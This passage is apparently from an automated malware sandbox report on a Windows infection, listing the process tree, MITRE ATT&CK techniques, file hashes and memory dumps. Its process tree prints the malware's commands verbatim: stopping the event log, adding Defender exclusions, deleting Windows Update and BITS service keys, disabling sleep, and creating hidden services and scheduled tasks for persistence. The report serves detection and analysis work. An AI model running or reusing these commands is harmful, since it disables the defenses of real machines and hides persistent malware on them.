  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:1668
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2696
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2228
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WAGDKRVZ"
      4⤵
      Launches sc.exe
      PID:2932
- - C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe
    "C:\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:2688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1728
  - - C:\Windows\system32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2752
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:1924
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:2900
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:1848
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:1736
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:320
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        5⤵
        
        PID:1648
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        5⤵
        
        PID:2116
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        5⤵
        Modifies security service
        
        PID:1652
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        5⤵
        
        PID:2092
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1948
  - - C:\Windows\system32\cmd.exe
      cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1944
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1940
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        Suspicious use of AdjustPrivilegeToken
        
        PID:1260
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2096
  - - C:\Windows\system32\dialer.exe
      C:\Windows\system32\dialer.exe
      4⤵
      Drops file in Windows directory
      PID:3028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell <#byjeowvd#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "Barac" } Else { "C:\Program Files\Cuis\bon\Bara.exe" }
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2204
    - - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /run /tn Barac
        5⤵
        
        PID:2364
- - C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe
    "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\schtasks.exe
      "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2832
  - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
      "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2584
    - - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1776

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "2095018224-93949587-1799823534104982219012234691081636728403-408151524-977889501"
1⤵
PID:1664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Cuis\bon\Bara.exe

Filesize
2.4MB

MD5
b70a5e7260b025e39b8016523a1f2d64

SHA1
aea86a6e4d9ba908d9e141a5d4166ba1e3b1b6a7

SHA256
fd7327848bb13a7a2919447c1818935482527bcc7de7da835b907826b7488490

SHA512
a0b63100553d8ae1bbc6471cc0b63499d82ff1503dc17f46cb1aee07a1332a053c485b74bbe7670638ff0d069496751f9326f9bbb6df96f794acb73969b182ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\F4R5fd8grr.exe

Filesize
502KB

MD5
ea001f076677c9b0dd774ae670efdf63

SHA1
37a4466f3c38b60a30fc1073b9d0b2d2d0e692e5

SHA256
19fd26fa3f76141cc05ef0c0c96ea91dcf900e760b57195f216a113b1cf69100

SHA512
6d634f47c0901e18cb159732c0ca1e7e6c930d16b18d0daea717c252ec7ddd37e90745b69512313dbbdac9099059b6f7cbe07044a71b36231c027818810c8652

Download Submit
C:\Users\Admin\AppData\Local\Temp\gfiKDLgr58thy4d.exe

Filesize
2.7MB

MD5
952f360a4651f948be3a673178631641

SHA1
60e58b89cfce587aa121baf431d55cbbecd21545

SHA256
a92133787af66e6d68a301ef087e4116f5cab3f538d8ec5e5e0eb95cecc68ea8

SHA512
af346587c95ac9e120ce63d46b22992e3ab69702af602ea6d7a16c3dcf9d2f7f19903233646cef8153aa877f5773c486db504ea6534bcbc3b136bd07b62483d0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
964570c03b8a3e08e6333aa5f988bc43

SHA1
e9a970f4b38773dcc8d0b55887f2d29eaeaa110a

SHA256
606586d8d931f73e2974ad66598a97b8a55f671337882002bdb5305133d2815b

SHA512
e3c759d400f65b1d68bf84849863dcfed02292fe7696f966a8517bde100c9d4ea0f0c3052ab0fd9bf50950c10f8485b572010b165e7d13c824935031ec477516

Download Submit
C:\Windows\Tasks\dialersvc32.job

Filesize
1KB

MD5
6e2eccdf8bedade9008b740a6012d4ba

SHA1
b7e227798610062eca7059b29ffc273600be0c4c

SHA256
581f90d7d1a3938885c7559b5d39b4f1178c7a322c8f0192bd2b1d8e262ece35

SHA512
8b24ac88f84e2417849e1a3d71930051b7f23d292ea4a0a8858fd2869297026d65046a4f5819d4f19dc3c50696c371bd69021e067d9dde47055098426b638827

Download Submit
C:\Windows\Tasks\dialersvc64.job

Filesize
1KB

MD5
ba1897d6166ed94ad21887aacca349b0

SHA1
fbd9a39fff565c7e79eb840d2779fb47fc09cc5e

SHA256
7b6e9b56d0d672db1f035bfe87780ebe691b7ba1525a1bd1b85488559aa9a29e

SHA512
d33af88ce704b21c3ca983121601647ef5568d956449b35006952a80609cacc61adcec0785e85d61dc25392f7c798189817911989003da72d5d80653f5f3ca27

Download Submit
\Users\Admin\AppData\Local\Temp\GR55Qg1hth.exe

Filesize
2.4MB

MD5
8e40252356a6fb3f8f52d1effa2c2c3c

SHA1
3bf5461b591a53dcb48ea2dc6535cd90aa786c4e

SHA256
de83dd82da3ebaa2c09fd75a7307ad5e2031ad8c911cd75753ffef3eb1571f0a

SHA512
c3286845aa20f9bf06bfbccb63c12a72ed223fc054881a66b643f55f81aa0df868c28199090cab6d37552b268615dc0605587a85f0d4ec6ee6d5ed25a5739a2a

Download Submit
memory/432-102-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/432-103-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/432-90-0x0000000000C40000-0x0000000000C6A000-memory.dmp

Filesize
168KB

Download
memory/432-89-0x0000000000AF0000-0x0000000000B13000-memory.dmp

Filesize
140KB

Download
memory/432-87-0x0000000000AF0000-0x0000000000B13000-memory.dmp

Filesize
140KB

Download
memory/476-105-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/476-94-0x0000000000300000-0x000000000032A000-memory.dmp

Filesize
168KB

Download
memory/476-106-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/492-114-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/492-115-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/492-113-0x00000000000A0000-0x00000000000CA000-memory.dmp

Filesize
168KB

Download
memory/500-119-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/500-120-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/500-117-0x0000000000310000-0x000000000033A000-memory.dmp

Filesize
168KB

Download
memory/592-118-0x00000000004A0000-0x00000000004CA000-memory.dmp

Filesize
168KB

Download
memory/592-122-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/592-123-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/672-125-0x0000000000490000-0x00000000004BA000-memory.dmp

Filesize
168KB

Download
memory/756-132-0x0000000000BE0000-0x0000000000C0A000-memory.dmp

Filesize
168KB

Download
memory/756-133-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/756-134-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/808-138-0x0000000037AF0000-0x0000000037B00000-memory.dmp

Filesize
64KB

Download
memory/808-136-0x0000000000B90000-0x0000000000BBA000-memory.dmp

Filesize
168KB

Download
memory/808-137-0x000007FEBF760000-0x000007FEBF770000-memory.dmp

Filesize
64KB

Download
memory/1236-79-0x0000000077990000-0x0000000077AAF000-memory.dmp

Filesize
1.1MB

Download
memory/1236-75-0x000000001A080000-0x000000001A362000-memory.dmp

Filesize
2.9MB

Download
memory/1236-76-0x0000000000A00000-0x0000000000A08000-memory.dmp

Filesize
32KB

Download
memory/1236-77-0x0000000001410000-0x0000000001450000-memory.dmp

Filesize
256KB

Download
memory/1236-78-0x0000000077AB0000-0x0000000077C59000-memory.dmp

Filesize
1.7MB

Download
memory/1308-282-0x00000000021F0000-0x00000000021F8000-memory.dmp

Filesize
32KB

Download
memory/1308-281-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/1468-81-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1468-80-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1468-83-0x0000000077990000-0x0000000077AAF000-memory.dmp

Filesize
1.1MB

Download
memory/1468-84-0x0000000140000000-0x0000000140042000-memory.dmp

Filesize
264KB

Download
memory/1468-82-0x0000000077AB0000-0x0000000077C59000-memory.dmp

Filesize
1.7MB

Download
memory/1728-42-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/1728-43-0x0000000002220000-0x0000000002228000-memory.dmp

Filesize
32KB

Download
memory/2584-35-0x0000000001230000-0x00000000012B4000-memory.dmp

Filesize
528KB

Download
memory/2604-30-0x000007FEF65E0000-0x000007FEF6FCC000-memory.dmp

Filesize
9.9MB

Download
memory/2604-36-0x000007FEF65E0000-0x000007FEF6FCC000-memory.dmp

Filesize
9.9MB

Download
memory/2604-29-0x0000000000850000-0x00000000008D4000-memory.dmp

Filesize
528KB

Download
memory/2604-28-0x000007FEF65E3000-0x000007FEF65E4000-memory.dmp

Filesize
4KB

Download
memory/2640-538-0x0000000019A30000-0x0000000019D12000-memory.dmp

Filesize
2.9MB

Download
memory/2688-37-0x000000013FA20000-0x000000013FC86000-memory.dmp

Filesize
2.4MB

Download
memory/2688-54-0x000000013FA20000-0x000000013FC86000-memory.dmp

Filesize
2.4MB

Download
memory/2948-50-0x00000000023C0000-0x00000000023C8000-memory.dmp

Filesize
32KB

Download
memory/2948-49-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2976-840-0x000000001A180000-0x000000001A462000-memory.dmp

Filesize
2.9MB

Download
memory/2976-841-0x00000000008C0000-0x00000000008C8000-memory.dmp

Filesize
32KB

Download
memory/3028-71-0x0000000140000000-0x0000000140056000-memory.dmp

Filesize
344KB

Download